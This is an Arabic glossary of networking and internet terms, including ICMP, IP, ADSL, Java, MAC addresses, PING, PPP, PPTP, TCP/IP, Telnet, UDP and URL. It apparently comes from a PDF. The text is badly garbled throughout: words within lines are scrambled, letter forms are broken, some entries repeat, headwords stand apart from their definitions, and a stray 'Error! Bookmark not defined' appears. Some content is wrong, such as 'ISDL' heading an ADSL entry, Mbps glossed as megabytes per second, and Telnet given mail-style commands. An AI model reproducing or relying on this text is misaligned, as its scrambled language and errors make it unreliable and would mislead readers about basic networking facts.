. HTMLأيضا انظر

يدعى أحیانا المكرر، يوسع المفرع الشبكة المشتركة، يتسلم . بإضافة مفرعات ومحطات أخرى إلیھا ويسمح

واإلشارات، األخرى، المفرع كافة اإلطارات والتصادمات، . ضمن الشبكةثم يعید إرسالھا ونشرھا

549

)I(

ICMP)بروتوكول رسائل التحكم النترنت(

IGMP)برتوكول الدارة المجموعات(

Immediate delivery)التوصیل الفوري(

Inter NIC)مركز سبكة المعلومات االنترنت(

)Internet Control Message Protocol ( ھو في نقل رسائل الخطأ البروتوكول المستخدم

وفقا والتحكم، المتعلقة بنقل حزم البیانات،إلى IP فعندما يتعذر توصیل حزمةIP .للبروتوكول

العنوان الذي تحمله، بسبب انشغال أو عطل طارئ اختناقات مرورية في في المزود الھدف، أو بسبب

في routers توصیالت الشبكة، يصدر أحد الموجھاتإلخطار المرسل بعدم وصول ICMPالشبكة، رسالة

IP .انظر أيضا. الحزمة لیعید إرسالھا

Internet Group Management Protocol ( ، يتیح لمزودات ويب IP/ TCPبروتوكول من مجموعة(

) IPاالشتراك في عملیة إرسال متعدد لحزم)multicast كوسیلة فعالة إلرسال الحزمة إلى ،

.إنترنت المضیفة فيمجموعة من الكمبیوتر

أحد خیارين توفرھما معظم برمجیات البريد إمكانیة إرسال الرسائل اإللكترونیة اإللكتروني، ويتیح

وإذا لم تكن على اتصال. فور االنتھاء من كتابتھابالشبكة وقت االنتھاء من كتابة الرسالة، فسیقوم

الھاتفي لتأمین االتصال البرنامج تلقائیا بفتح الخط والخیار اآلخر ھو التوصیل المؤجل. بالشبكة

deferred delivery حیث يحتفظ البرنامج بالرسائل ، ، إلى أنoutbox التي كتبتھا في صندوق الصادر

تحقق االتصال مع الشبكة، وتصدر أمرا بإرسال ما دفعة يحتويه صندوق الصادر من رسائل جديدة

.واحدة

nter Internet Network Information Ce الھیئةعن منح ) من بین أمور أخرى ( اإلدارية المسؤولة

وتحظى ھذه RFC .النطاقات وتوزيع وثائق أسماء الھیئة بالدعم المالي من قبل المؤسسة الوطنیة

، وتديرھا حالیا مؤسسةNSF األمريكیة للعلومNetwork Solution وشركة.. T& ATانظر أيضا. RFC

550

Intranet)انترنت(

IP)بروتوكول انترنت(

ISDL)خط االشتراك الرقمي الالتناظري(

، تستخدم ) WAN(أو واسعة ) LAN (شبكة محلیةالكبیرة، وال يشترط أن تكون متصلة في المؤسسات

بشبكة إنترنت، وإنما تؤمن وظائف مشابھة لھا على. مستوى المؤسسة، ومن خالل برامج المتصفحات

بدال من تستخدم مزودات ويب في شبكات إنترانت،مزودات الملفات أو مزودات التطبیقات التقلیدية،

البنیة التشعبیة، بشكل بسیط لنشر المعلومات ذاتومتجانس، وتسھیل عملیات صیانتھا وتحديثھا،

ن االعتماد على للعاملین بشكل فوري، بدو وتوفیرھاوقتا المطبوعات الورقیة المكلفة، والتي تستغرق

طويال لتوزيعھا على كافة فروع وأقسام المؤسسة، إنترانت نموا كبیرا وشھدت شبكات! عند كل تعديل

، بسبب توفر برامج المتصفحات، 1995منذ عام مزودات ويب، على نطاق واسع، وبرامج إنشاء

مثل متصفح إنترنت( جانا وبأسعار معقولة، أو موتتیح بعض ).إكسبلورر من مايكروسوفت

المؤسسات الوصول إلى أجزاء من شبكة إنترانتالخاصة بھا، لبعض األشخاص أو المؤسسات األخرى، عبر شبكة ويب، أو عبر اتصال ھاتفي

، وعندھا تدعى ھذه األجزاء ) in -dial(مباشر ."شبكة إكسترانت" )ocolProtInternet ( البروتوكول المسؤول عن

تراسل حزم البیانات عبر إنترنت وتوجیھھا إلى بعنوان أحد IP دمغ حزمة ويشبه. أھدافھا

الكمبیوترات المتصلة بإنترنت، إلى حد بعید، كتابة الرسالة قبل إلقاھا في صندوق وان على مغلفالعن

دور صندوق الرسائل، IP ويلعب بروتوكول. الرسائلوھو يتیح للموجھات والشبكات المعنیة بنقل

فل تعاونھا في اإلشارات بما يك الرسالة، أن تتبادل UDP .و و TCP انظر أيضا. إيصال الحزمة إلى وجھتھا

) Asymmetric Digital Subscriber Line ( تقنیة

للخطوط الھاتفیة الرقمیة، توفر اتصاال عالي السرعة T & ATوتروج شركة. أسالك نحاسیة عادية برع

في تحقیق الوصول ISDN لھذه التقنیة كبديل لتقنیة توصف ھذه الخطوط باالتناظرية. إلى إنترنت

asymmetric نقلھا للبیانات غیر متساوية ألن سرعةففیما ال تتجاوز سرعتھا بین : في االتجاھین

كیلوبت في 64معدل uplinkوالمزود المشترك ( downlinkالثانیة، فإن سرعتھا باالتجاه المعاكس

میجابت في 6يمكن أن تصل إلى ) وھي األھم وت. الثانیة

،)Internet Service Provider ( شركة، غالبا ما توفر خدمات إنترنت لمن يحتاجھا تكون محلیة،

(I)

551

ISP)موفر خدمة االنترنت( )Internet Service Provider ( شركة، غالبا ما خدمات إنترنت لمن يحتاجھاتوفر تكون محلیة،

.رسوم شھرية أو بالساعة مقابل

552

Java)جافا(

JavaScript)جافا اسكربت(

، طورتھا شركةoriented- objectلغة برمجة كائنیةSun Microsystems وتستخدم إلضافة الرسوم ،

يا المزا المتحركة، وأسعار البورصة الفورية، وغیرھا منتتیح لغة جافا إمكانیة . الدينامیكیة إلى صفحات ويب

عبارة عن برامج تطبیقات applets )كتابة بريمجاتإلى server ، يمكن إرسالھا من المزود)صغیرة

المتصفح، الذي يستطیع فك شیفرتھا وتنفیذھا، Java virtual بواسطة ما يسمى آلة جافا االفتراضیة

machine JVM مدمجة فیه أو تضاف إلیه، التي تكون .االفتراضیة أن تكون متوافقة مع وينبغي آللة جافا

المنصة التي تعمل علیھا، أما بريمجات جافا فیمكنتنفیذھا على أي منصة تحتوي على آلة جافا ويندوز أو االفتراضیة، سواء كانت منصات ماكنتوش أو

غیرھما، ولذلك توصف لغة جافا بأنھا مستقلة عن وتوفر آلة جافا platform independent .ةالمنص

الكمبیوتر االفتراضیة تدابیر أمنیة لحماية موارد وبیاناتتوفر . الذي يستضیفھا، من احتماالت العبث والتخريب

شائعة االستخدام، الدعم للغة معظم برامج التصفحوتعكف شركة صن حالیا على تطوير رقاقات . جافا

قات جافا بكفاءة عالیة، خاصة لتشغیل تطبی معالجاتوتعمل العديد .بدون الحاجة إلى آالت جافا االفتراضیة

. من الشركات على إنتاج أدوات تطوير خاصة بلغة جافامايكروسوفت ظھرھا للغة جافا، فإنھا وفیما ال تدير

تنتھج سیاسة مناوئة لشركة صن، فیما يتعلقبمواصفاتھا، وھي تجاھد من جھة أخرى للترويج

ActiveX.نیتھا المنافسة، لتق

Sun Microsystems لغة طورتھا كل من شركتيإضافة مزايا تفاعلیة إلى صفحات ، لتسھیلNetscapeو

وعلى الرغم من كونھا مشتقة من لغة جافا، . ويبجافاسكريبت تمثل لغة منفصلة، وإلى حد ما، أكثر فإن

جھة الزبون وتنحصر فاعلیة جافاسكريبت في. بساطةentcliحیث أن المفسر ، interpreter الذي ينفذ ،

.في المتصفح تعلیماتھا، يكون مدمجا

(J)

553

)L(

جدول من المعلومات يضم قائمة بالبوابات، يرافق كل عندما يصل إطار معین، . بت48بطول منھا عنوان

تجري البحث عن عنوان ھدفه ضمن جدول التعرف، ات أن يرشح أو يمرر إلى البوابة أو البواب فإما

معروفا، يبث إذا لم يكن عنوان الھدف. المالئمةيحافظ على حداثة . اإلطار، عادة، إلى جمیع البوابات

عناوين المصدر لإلطارات جدول التعرف، بفحص" يذكر"و. المتسلمة وتحديث الجدول وفقا لذلك

ويمكن . أية محطة مرتبطة بأية بوابة الجدول، بذلكاإلدارة رة عبر إمكانیاتالتعامل مع ھذا الجدول مباش

.في البداالت

تستخدم كلمة وصلة، في سیاق الحديث عن أو صورة، يمكن شبكة ويب، للداللة على نص

بتفعیلھا الوصول إلى مكان آخر في الصفحة ذاتھا أو تفعیل الوصلة بالنقر علیھا ويمكن. في خارجھا

بالماوس، أو بنقل المؤشر علیھا بواسطة مفتاحTabلضغط على مفتاحا ، ثم. Enter تشیر كلمة

وصلة أيضا، إلى االتصال بین كمبیوترك وبقیةفقد : وتكون مثل ھذه الوصالت على أنواع. الشبكة

، أو عبر dialup تكون عبر خط ھاتفي بإدارة الرقمھاتفي ( توصیالت الشبكة المحلیة، أو بواسطة خط

ة أو السلكیا، بواسطة األشع ،leased line مؤجر) .تحت الحمراء أو موجات الراديو

مستقبالت إثرنت، تجعل البیانات /آلیة في مرسالت

، تعود إلى MAU إلى MII أو AUI بوابة المرسلة من، وھي MII أو AUI خطوط اإلرسال في واجھة

.ألغراض التشخیص تستخدم

Learn Table)جدول التعرف(

Link)رابط(

Loop Back)لحلقة الراجعةا(

554

)M(

التي تعني Internet citizen مصطلح مختصر للعبارةيشیر ھذا المصطلح إلى حالة األفراد ". الشبكة مواطن"

إنترنت، وكأنھا الذي يشعرون بانتماء قوي إلى شبكةموطنھم، فیراعون قوانینھا المكتوبة وغیر المكتوبة،

تمون بتطورھا سالمتھا وأمنھا، ويھ ويحرصون على ويوصف مثل ھؤالء بأنھم مواطنو شبكة. ومستقبلھا

good netizen .صالحون

األقراص (وحدة تحكم تسمح بالوصول إلى وسائط إثرنت تنجز. ، والتعرف على مواصفاتھا)المدمجة، الخ الصلبة،

MAC الشكل المتوازي عادة، عملیة تحويل البیانات من كواجھة بین نظام وتعمل. إلى التسلسلي، وبالعكس

ثنائي االتجاه، والواجھة البینیة الناقل المتوازي .On-Addالتسلسلیة للوسائط

عنوان مؤلف من ستة بايتات يعطي لجھاز يعمل ضمن

يفحص كل جھاز على الشبكة أول ستة .شبكة إثرنت MAC بايتات من كل إطار يتسلمه، ويقارنھا مع عنوان

12 وحتى 7ايت رقم للمحطة المرسلة، بدءا من الب .ضمنا

تشیر العبارة بشكل عام إلى قوائم تضم عناوين للبريداإللكتروني، تشكل آلیا أو يدويا، لغرض استخدامھا في

الجھات التي تتضمنھا ھذه توجیه رسائل إلكترونیة إلى ويمكن للغالبیة العظمى من برامج البريد. القوائم

نة، إلى قائمة تضم اإللكتروني، تكرار بث رسالة معیفي سیاق إنترنت، تشیر العبارة. مجموعة من العناوين

إلى مجموعة من المستخدمین الذي ينتسبون إلى جھة الرسائل التي تصدرھا حول موضوع معینة بھدف تلقي

وتصل مثل ھذه الرسائل تلقائیا، إلى جمیع. محددوازدھرت قوائم البريد في . المسجلین في القائمة

الوسیلة الوحیدة عندما كانت بالنسبة للكثیرين،الماضيلكن الكثیر من ھذه . للحصول على معلومات عبر الشبكة

استبدلت، فیما بعد، بالمجموعات القوائم الكبیرة وتستخدم قوائم البريد حالیا،newsgroups .اإلخبارية

لنشر المعلومات عن موضوعات شديدة التخصص، ولنشر وألغراض الترويج ات المغلقة،الرسائل في المجموع

التجاري، حیث يتطفل علیك مرسلوھا، بصرف النظر عن .رغبتك في تلقیھا

MAC-MAC Address

Media Access Controller-MAC) التحكم بالوصول )للوسائط

Address-MAC)عنوان(

Mailing List)قوائم البريد(

555

في ھذا " میجا"لمة واحدة لقیاس عرض الحزمة، وتعني ك، ولیست القیمة 6 مرفوعا إلى األس 10الرقم السیاق،

.1024×1024المعروفة التي تساوي

، ASCII بروتوكول لنقل البیانات التي لیست على ھیئةوالرسومیات واألصوات عبر إنترنت، باستخدام مثل الصور

و POP أيضا انظرSMTP .بروتوكول نقل النصوص، مثل.SMTP

Mbps)یجا بايت في الثانیةم(

MIME)Multipurpose Internet Mail Extension (

556

)N(

مجموعة غیر معتمدة رسمیا من قواعد اللیاقة يستحب اتباعھا في التعامالت والسلوك، التي

وتھدف . عبر إنترنت، وغیرھا من الشبكات العامةالقواعد إلى جعل الشبكة مكانا مريحا ھذه

.دمیھا، واستخدام مواردھا بصورة عقالنیةلمستخمن اآلداب التي غالبا ما يجري التذكیر بھا،

المجموعات استخدام البريد اإللكتروني بدال مناإلخبارية لتبادل الرسائل الشخصیة، والخروج من

عند التوقف عن استخدامھا، log out الشبكةبحروف صغیرة ) اإلنجلیزية ( وطباعة الرسائل

من االقتصار على الحروف الكبیرة بیرة، بدالوكفقط، وااللتزام بقواعد التھذيب وعدم التعرض

خالل الحوارات التي تجري في محافل لألشخاص ومن التعالیم القديمة في. ومنتديات إنترنت

النیتیكیت، عدم استخدام البريد اإللكتروني التجاري، والمجموعات اإلخبارية ألغراض الترويج

م اللجوء إلى االتصال بكمبیوتر بعید، إذا توفر وعدلكن أولى ھاتین . بالغرض كمبیوتر قريب يفي

القاعدتین بدأت باالندثار، نتیجة تعمق الطابع إلنترنت، وأصبحت الثانیة غیر ذات معنى التجاري

نتیجة شیوع استخدام متصفحات ويب، التي الفة تظھر لنا الموقع الجغرافي للكمبیوترات المضی

.التي نزورھا

التي Internet citizen مصطلح مختصر للعبارةيشیر ھذا المصطلح إلى ". الشبكة مواطن"تعني

حالة األفراد الذي يشعرون بانتماء قوي إلى شبكةإنترنت، وكأنھا موطنھم، فیراعون قوانینھا المكتوبة

سالمتھا وأمنھا، وغیر المكتوبة، ويحرصون علىويوصف مثل ھؤالء . مستقبلھاويھتمون بتطورھا و good netizen .صالحون بأنھم مواطنو شبكة

)Network News Transfer Protocol ( البرتوكول

عبر Usenet المستخدم في نقل رسائل شبكة .إنترنت

Netiquette network etiquette

Netizen)مواطن الشبكة(

NNTP)ل لشبكة االخباربروتوكول النق(

557

قطعة من المعلومات التي ترسلھا العقد على الشبكة يسمى قسم البیانات من الرزمة . البعض إلى بعضھا

) Unicast (وحیدة الھدف يمكن أن تكون الرزمة "اإلطار" أي مرسلة إلى جھاز واحد، أو متعددة األھداف

) Multicast(مرسلة إلى جمیع األجھزة، أو عامة أي أي مرسلة إلى كل األجھزة على) Broadcast (دفالھ

.الشبكة

قطعة من البیانات، تنشأ نتیجة لتشطیر الرسالة للمعلومات المراد نقلھا عبر الشبكة، إلى المتضمنة

في كتل صغیرة، تضاف إلیھا بیانات خاصة بالتحكموترسل ھذه . النقل وعنوان الوجھة التي تقصدھا

في الشبكة، ات المتاحةالحزم فرادى، عبر المسارلیصار إلى إعادة تجمیعھا عندما تبلغ وجھتھا، إلرجاعھا

تستخدم تقنیة تجزئة البیانات . األصلیة إلى ھیئتھاالرقمیة إلى حزم في الغالبیة العظمى من الشبكاتفائقة السرعة، وھي تمثل أساس مجموعة

.إنترنت ، المستخدمة فيIP/ TCPبروتوكوالت

، يستخدم لكشف ما إذا كان IP/TCPأحد تطبیقاتويتم . متصال بالشبكة وجاھزا لالتصال به كمبیوتر معین

الصدى كشف حالة كمبیوتر ما، بإرسال إشارة إرجاعICMP echo request انظر أيضا. وانتظار الرد. ICMP

)Post Office Protocol ( ،بروتوكول لنقل النصوص

البريد اإللكتروني يستخدم إلرسال واستخراج رسائل ، الذي SMTP وخالفا لبروتوكول. إنترنت ضمن شبكة

يوفر يستخدم لنقل رسائل البريد بین النظم المزودة،وسیلة لتفاعل برامج البريد مع صناديق POP بروتوكول

حین البريد االفتراضیة، التي تحتفظ بالرسائل إلى ليتوفر بروتوكو. استخراجھا أو إرسالھا إلى وجھاتھا

POP 2تحت اسمین POP3 .و POP والتشابھة بین ھذين البروتوكول ھو في االسم فقط، وھما غیر

SMTP .انظر أيضا. متوافقین على اإلطالق)Point Protocol -to-Point( البروتوكول األكثر انتشارا

لتحقیق االتصال بإنترنت بواسطة إدارة رقم ھاتفي. up-dialويشبه PPP البروتوكولIP SL ولكنه أكثر

استقرارا واعتمادية، حیث يفتقر الثاني إلى إمكانیات واكتشاف األخطاء، ودعم تعددية ضغط البیانات،

جمیع ھذه PPP ويوفر. البروتوكوالت على الخط الواحد PPTP .و SLIP انظر أيضا. المزايا، ويزيد

)Point Tunneling Protocol -to-Point( شكل متقدم

" Tunnelingحفر نفق"يقوم على PPP من بروتوكولينتج ھذا النفق االفتراضي . بین نقطتین في شبكة

تعلیب الحزم العائدة لبروتوكول معین، ضمن حزم عن

Packets)رزمال(

Packet)حزمة(

PING)Packet Internet Groper(

POP)بروتوكول مكتب البريد(

PPP)بروتوكول االتصال من نقطة إلى نقطة(

(P)

558

بنقل البیانات في عائدة لبروتوكول آخر، وھو ما يسمح، عبر شبكات ال تعمل بھذه IP/ TCPھیئة بروتوكوالت

ثر شیوعا لبروتوكولويتمثل االستخدام األك .البروتوكولPPTP في تحقیق االتصال بین الشبكات الفیزيائیة

واحدة تستخدم المتباعدة، وصوال إلى شبكة افتراضیة PPP .انظر أيضا. إنترنت كواسطة لالتصال فیما بینھا

مجموعة من الروتینات والبینیات البرمجیة، تؤمن

االتصال المنطقي بین برامج التطبیقات بمجموعھاالبروتوكوالت ويمكننا تخیل ھذه. توصیالت الشبكةو

على شكل طبقات وظیفیة تتوضع فوق بعضھا، بحیث وتمرر مخرجاتھا إلى الطبقة تؤدي كل طبقة عملھا،

.األعلى أو األدنى منھا، حسب مقتضى الحال

ھو اللغة التي تتخاطب بھا أجھزة الكمبیوتر المتصلة وإذا أردنا تعريف . تبھدف تبادل المعلوما عبر الشبكة،

لھیئات البروتوكول بلغة تقنیة، نقول أنه وصف رسميالرسائل والقواعد التي يجب على كمبیوترين اتباعھا

تستطیع البروتوكول وصف تفاصیل .لتبادل تلك الرسائلاتباعھا البنیة التحتیة للواجھة البینیة بین كمبیوترين

ت وصف تستطیع البروتوكوال. لتبادل تلك الرسائل( للواجھة البینیة بین كمبیوترين تفاصیل البنیة التحتیة

.( مثل ترتیب البتات والبايتات المرسلة عبر األسالكوتستطیع أيضا، وصف عملیات التبادل التي تجري بین

مثل الطريقة ( الفوقیة البرامج على مستوى البنیة .) التي يتبادل بھا برنامجان، الملفات عبر إنترنت

PPTP)بروتوكول النفق من نقطة إلى نقطة(

Protocol Stack)كدس البروتوكوالت(

Protocol)بروتوكولال(

559

)Q(

QuickTime QT)معمارية خاصة ابتكرتھا شركة أبل، للتعامل مع )كويك تايملعنصر الوقت، مثل الصوت البیانات الحساسة

وھي تمتاز بالقدرة على المواقتة ما بین . والفیديومسارات للصوت والصورة، وضغط البیانات وإزالة عدة

، ) sion compression decompres(الضغط عنھاإلعادتھا إلى ھیئتھا األصلیة، واعتماد ھیئة عامة

التعامل معھا بواسطة نظم غیر للبیانات، يمكن .اسم برنامج يوفر المزايا المشار إلیھا أعاله. متوافقة

كتوسعة لنظام تشغیل QuickTime وتتوفر وظائفعلى PC ماكنتوش، في حین أنھا تعتمد في نظم

ھیئة ملف DLL .ينامیكيالد برنامج مكتبة الربط، كأن تقول QuickTime بیانات يتوافق مع مواصفات

QuickTime .لقطة فیديو من نوع :تلقیت

560

(R)

) Reverse Address Resolution Protocol( بروتوكولإنترنت الذي يسمح بتحويل عناوين الشبكة الفیزيائیة

IP إلى عناوين) مثالبت 48 عنوان إثرنت مؤلف من(يستخدم ھذا البروتوكول RARP .بإرسالھا إلى مزود

أقراص التخزين، من قبل محطات العمل المجردة من. الخاصة بھا لدى شروعھا بالعمل IP لتحديد عناوين

ARP .انظر

مجموعة من الوثائق التي يمكن الوصول إلیھا عبر ، على مواصفات قیاسیة ومقترحات إنترنت، تحتوي

ويمكن. وعلى غیرھا من المعلومات عن تقنیات إنترنتالتي تحتوي FTP استجالب ھذه الوثائق من مواقع

على العنوان InterNIC مثل موقع( علیھا ) net .internic.dsكما . كلمة سر بدون استخدام

يمكن طلبھا بواسطة البريد اإللكتروني من العنوان)com .internic.ds@mailserv.(

از، أو برنامج، يمكنه استقبال حزم البیانات من جھفرعیة، أو كمبیوتر، لیقوم بتمريرھا شبكة، أو شبكة

الستخدام ستحتاج. عبر المسار المالئم، باتجاه ھدفھاموجه، إذا كانت لديك شبكة خاصة متصلة بإنترنت، أو

لو كان شبكة، عند اتصالك كنت تعامل كمبیوترك كمابخدمة االتصال بإنترنت بواسطة بالجھة التي تزودك

وحیث أن على الموجه . أو عبر خط مؤجر ،ISDN خطيتلقاھا، أن يقوم بفحص عنوان وجھة البیانات التي

وإيجاد أفضل مسار تسلكه للوصول إلى ھذه الوجھة يزيد، عادة، على ثمن مودم بأسرع ما يمكن، فإن ثمنه

ة من وتحتاج األنواع المتقدم. بسیط أو بطاقة شبكةالتي تستخدم للربط بین الشبكات الكبیرة، الموجھات

.إلى وحدات تخزين، وھي تكلف أكثر

ترتكز قرارات . جھاز ينظم حركة المرور بین الشبكاتعلى معلومات " المفرع"البیانات التي يتخذھا إرسال

إنشاؤھا، طبقة الشبكة وجداول التفريع، التي يتم .تفريعغالبا، بواسطة بروتوكوالت ال

RARP)بروتوكول الحل العكسي للعنوان(

RFC)Request for Comments(

Router)موجة(

Router)المفرع(

561

)S(

يستخدم ھذا المصطلح في سیاق الحديث عن المواقع التي توفر خدمات شبكة ويب، لإلشارة إلى

البحث عن المعلومات، باالعتماد على كلماتوتقوم آلة . ، أو عبارات معینةkeywords مفتاحیة

البحث، عادة، بالبحث عن الكلمات التي يدخلھاالمستخدم في قاعدة للبیانات تكون قد أنشأتھا

التي تعني ،spider مسبقا، بواسطة برنامج يدعىوتقوم مثل ھذه البرامج بالتجوال الدائب ". العنكبوت"

من النصوص في محتوياتھا في شبكة ويب، لتنظیمفھارس ضخمة، تضم الكلمات وعناوين الصفحات

لكن، بسبب االتساع الھائل .التي تحتوي علیھالشبكة ويب، والتبدل المستمر في محتوياتھا، فقد

النتائج التي تعود بھا آالت البحث، على تحتوي العديد من الوصالت التي ال تفضي إلى صفحات

.تحتوي على المعلومات المطلوبة

كمبیوتر يزود الكمبیوترات المتصلة به، بالملفات تتضمن مزودات إنترنت الشائعة، .والمعلومات

) مزودات الملفات، ومزودات خدمات أسماء النطاق).domain names

يضاف آلیا إلى نھاية كل ) ASCII (ملف آسكيإلكتروني، عند إرسالھا، ويستخدم رسالة بريد

لكن بشكل غیر رسمي، للتعريف عن المرسل، ويجب استخدام التواقیع الرقمیة إلثبات ) وغیر موثوق

تدعم .( ھوية المرسل، وصحة البیانات، عند اللزوممعظم برامج البريد اإللكتروني ملفات التواقیع، حیث

معلومات في ھذا تسمح للمستخدم بكتابة أيويضع المستخدمون، عادة، أقواال . الملف، من ضمنھا

بعض الصور البسیطة باالعتماد ة، أو يشكلونمأثورعلى األحرف األبجدية وعالمات الترقیم والرموز

باإلضافة إلى اسم المستخدم وعمله الخاصة، .وعنوانه وأرقام االتصال به

) Serial Line Internet Protocol( بروتوكول لتحقیق

، up- dialاالتصال بإنترنت بواسطة إدارة رقم ھاتفينطاق واسع، ولكنه بات متخلفا خدم علىوھو مست

من الناحیة التقنیة، SLIP ويعد. بعض الشيءframing - packet بروتوكوال يعتمد تأطیر الحزمة

عبر خط IP إنشاء وإرسال حزم في تحديد كیفیةبیانات تسلسلي، مثل الخط الھاتفي الواصل بین

، وP Iانظر. إنترنت المودم المتصل بكمبیوترك ومزود

EngineSearch )محرك بحث(

Server)مزود(

Signature File)ملف التوقیع(

SLIP)بروتوكول الخط التسلسلى إلنترنت(

562

PPP و. PPTP )Protocol Transfer MailSimple ( بروتوكول من

، يستخدم لنقل النصوص أثناء IP/ TCPمجموعةوھو نسخة مبسطة عن .تبادل الرسائل عبر إنترنت

ھیئة وطريقة SMTP يحدد بروتوكولMTP .بروتوكول و MIME انظر أيضا. تبادل البیانات بین مزودات البريد

.POP

SMTP)البروتوكول البسیط لنقل البريد(

563

(T)

خط مؤجر لالتصال بإنترنت، تصل سرعة نقل البیانات تتوفر مثل ھذه . یةمیجابت في الثان1 544.عبره إلى

.الخطوط، عادة للشركات الكبیرة والجامعات

خط مؤجر فائق السرعة لالتصال بإنترنت، تصل .میجابت في الثانیة 45سرعة نقله إلى

شراء مساحات إعالنیة على مواقع ويب يقصدھا

المستخدمین، اعتمادا على جمھور محدد منالتي ) demographic (الجغرافیة-المعلومات البشرية

الموقع، مثل الجنس، وفئة العمر، يقدمھا ...واالھتمامات، ومعدل الدخل

، وIP ، وTCP مجموعة من بروتوكوالت إنترنت تتضمن

UDPو ، ARP، RARPو ، ICMP ويمكن . وغیرھا الكثیرلھذه البروتوكوالت التي توصف بأنھا الغراء الذي يشد

ربط بین إنترنت بعضھا إلى بعض، أن تحقق ال أجزاءمباشرة، شبكات متباعدة وغیر متصلة فیزيائیا بصور

لتشكل معا شبكة افتراضیة واحدة أو ما يسمى ."إنترنت"

بشكل كي يستطیع الكمبیوتر استخدام بروتوكوليتألف IP/ TCP .مناسب، يجب أن يتوفر فیه مكدس

( وبرمجیات المقابس ،IP/ TCPمن برمجیات مكدس، وبرمجیات )بیوترات ويندوز لكمDLL . WINSOCKمثل

) التي تعرف ببرمجیات قیادة الحزم قیادة األجھزة،). packet drivers مع مكدس95يأتي ويندوز ،

من 1.1اإلصدارة الخاص بمايكروسوفت، متضمنا .، وبرامج قیادة الحزمDLL. WINSOCKمايكروسوفت

) Transmission Control Protocol( أحد بروتوكول

، الذي يوفر وسیلة موثوقة لنقل IP/ TCPمجموعة، يمكن TCP وبفضل بروتوكول .البیانات عبر إنترنت

لكمبیوتر زبون متصل بإنترنت، أن يقیم صلة افتراضیة وخالفا . كمبیوتر زبون آخر، وتبادل البیانات عبرھا مع

طريقة مضمونة TCP ، يوفر برتوكولUDP لبروتوكول إرسال حزم البیانات في تراسل البیانات، حیث يعاد

حتى تسلمھا بشكل صحیح، أي الضائعة أو التالفة. بتطابق البیانات المستقبلة مع البیانات المرسلة

UDP .انظر

1T 3T

Targetting)التوجیه(

IP/TCP Internet /Transmission Control Protocol

)Protocol(

IP/TCP)المكدس(

TCP)بروتوكول التحكم بالنقل(

564

بروتوكول إنترنت القیاسي لالتصال بالطرفیات البعیدة). remote terminate ( تتوفر زبائن بروتوكول. العمللمعظم منصات ) " Telnet client (تلینت"

لالتصال بأحد مواقع " تلینت"عندما تستخدم مثال، تستطیع إصدار أوامر مشابھة ،"يونیكس"

،( ، الخUSER ، وDELE ، وLIST مثل( ألوامر دوس .وكما لو كان الموقع كمبیوترا محلیا

نسخة مبسطة من بروتوكول تخلو من إمكانیة

د باستخدام كلمة السر، وتعتم التدقیق في الھويةTCP .بدال من UDP في نقل البیانات على بروتوكول

بالبساطة والسھولة، مقارنة TFTP يمتاز بروتوكول . FTP مع

ويمكن أن T-Base .10اسم آخر للكابالت من نوع من الكوابل التي تحتوي على تعني أيضا أي نوع

تتألف أزواج . أزواج مفتولة ومنفصلة من األسالك، ويمكن 6+3 و 2+1األسالك ، من T-Base 10النوع

3 مع 1 بھذا إعداد الكابالت المتصالبة بوصل السلك .6 مع 2والسلك

Telnet)التلنت(

TFTP)Trivial File Transfer Protocol(

Twisted Pair)كابالت زوجیة ملتفة(

565

)U(

UDP)بروتوكوالت جزئیات بیانات المستخدم(

URL)عنوان الموارد الموحد(

)ProtocolUser Datagram ( يسمح أحد بروتوكوالتبین لبیانات،من ا ) datagram (بنقل حزم أو جزئیات

، ال يحتاج TCP وخالفا لبروتوكول.تطبیقات إنترنت، إلى تأسیس UDP المرسل والمستقبل في بروتوكول

الصلة بینھما بشكل مسبق قبل الشروع بتراسل موثوقا، فھو ال يضمن UDP بروتوكول وال يعد. البیانات

وصول جزئیات البیانات بالتسلسل الذي أرسلت به، بل وإذا كانت . أبدا وصول ھذه الجزيئات أنه ال يضمن

االعتمادية مطلوبة، فیجب تحقیقھا من خالل UDP التطبیقات التي تستخدم

) Uniform Resource Locator( مؤشر يدل على مكان

أي نوع آخر من الموارد، ضمن فضاء وجود صفحة، أو وأصبح من الشائع استخدام ھذا النوع من. شبكة ويب

اقات رجال األعمال واإلعالنات، كمرجع العناوين في بطوتتیح متصفحات .لصفحات ذات صلة، في شبكة ويب

معین، بإدخال URL ويب التوجه مباشرة إلى عنوانلكن غالبا ما يتم . نص ھذا العنوان في نافذة خاصة

URL التي تشیر إلیھا عناوين التوجه إلى الصفحاتقع المختارة، بالنقر علیھا بالماوس، ضمن قائمة بالموا

تتضمن العنوان في hyperlink أو في وصلة تشعبیة، عادة، بتحديد البرتوكول URL يبدأ عنوان. صفحة أخرى

استخدامه للوصول إلى الصفحة التي يشیر الواجبالمستخدم في الوصول إلى http إلیھا، مثل بروتوكول

لنقل الملفات من وإلى ftp صفحات ويب، أو بروتوكول ، ثم عنوان المزود( "//" )يلي ذلك فاصل P FT .مواقع

serverالذي يحتوي على الصفحة، مثل! Error ( .Bookmark not definedيقود ، متبوعا بالمسار الذي

إلى الصفحة المشار إلیھا ضمن نظام الملفات الخاص الملف وامتداد االسم بالمزود، وصوال إلى اسم

566

)V( VRML) Modeling LanguageVirtual Reality( المقابل ثالثي األبعادD - #للغة HTML وھي لغة ،

مفسرة تسمح بوصف مشاھد ثالثیة األبعاد غنیة، يمكن عرضھا بواسطة باستخدام ملفات نصوص بسیطة،

مشكلة VRML وتحل لغةVRML .متصفحات تدعم لغةبطء تطبیقات الملتیمیديات على الشبكات، والناتجة عن

نقل أعداد كبیرة من ملفات لتطبیقات إلىحاجة ھذه االصور عبر الشبكة، باالكتفاء بنقل ملف نصوص بسیط

، وإلقاء مھمة تولید المشاھد ثالثیة األبعاد VRML بلغة .على عاتق المتصفح

567

)W( WALS)خدمة معلومات المناطق الواسعة(

Winsocks)مقابس الويندوز(

WWW)World Wide Web(

معلومات موزعة، وأداة بحث تسمح خدمةوالفھارس في عملیات باستخدام اللغات الطبیعیة

يستخدم العديد من أدوات البحث في . البحث .للبحث عن المعلومات WAIS إنترنت، محرك

، أي مقابس Windows Socets اختصار لعبارة

إلى مجموعة من Winsocks تشیر عبارة. ويندوزرمجین الذين يطورون الموصفات القیاسیة للمب

.بیئة ويندوز ضمن تطبیقات

في HTTP عالم افتراضي يتكون من مزودات إنترنت، تحتوي على صفحات ذات ھیئات غنیة

HTML يمكن جلبھا بواسطة متصفحات ويب، مثل مايكروسوفت إنترنت إكسبلورر، ونتسكیب

ومن الشائع اإلشارة إلیھا بكلمة ويب . نافیجیتور، 1992 ت ھذه الشبكة العامنشأ. لالختصار

